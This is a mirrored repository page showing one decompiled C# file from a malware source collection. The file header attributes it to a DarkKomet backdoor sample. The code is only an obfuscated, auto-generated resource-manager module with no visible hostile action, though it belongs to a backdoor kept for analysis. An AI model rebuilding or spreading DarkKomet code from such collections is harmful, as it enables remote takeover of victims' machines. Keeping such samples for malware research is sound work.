mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-20 00:58:52 +00:00
34 lines
1.1 KiB
C#
34 lines
1.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type:
|
|||
|
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System.CodeDom.Compiler;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Globalization;
|
|||
|
using System.Resources;
|
|||
|
|
|||
|
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
|
|||
|
[StandardModule]
|
|||
|
[HideModuleName]
|
|||
|
[DebuggerNonUserCode]
|
|||
|
internal sealed class \u0008
|
|||
|
{
|
|||
|
private static ResourceManager \u0002;
|
|||
|
private static CultureInfo \u0003;
|
|||
|
|
|||
|
internal static ResourceManager \u0002()
|
|||
|
{
|
|||
|
if (object.ReferenceEquals((object) \u0008.\u0002, (object) null))
|
|||
|
\u0008.\u0002 = new ResourceManager(\u000E.\u0002(759806128), typeof (\u0008).Assembly);
|
|||
|
return \u0008.\u0002;
|
|||
|
}
|
|||
|
|
|||
|
internal static CultureInfo \u0002() => \u0008.\u0003;
|
|||
|
|
|||
|
internal static void \u0002(CultureInfo _param0) => \u0008.\u0003 = _param0;
|
|||
|
}
|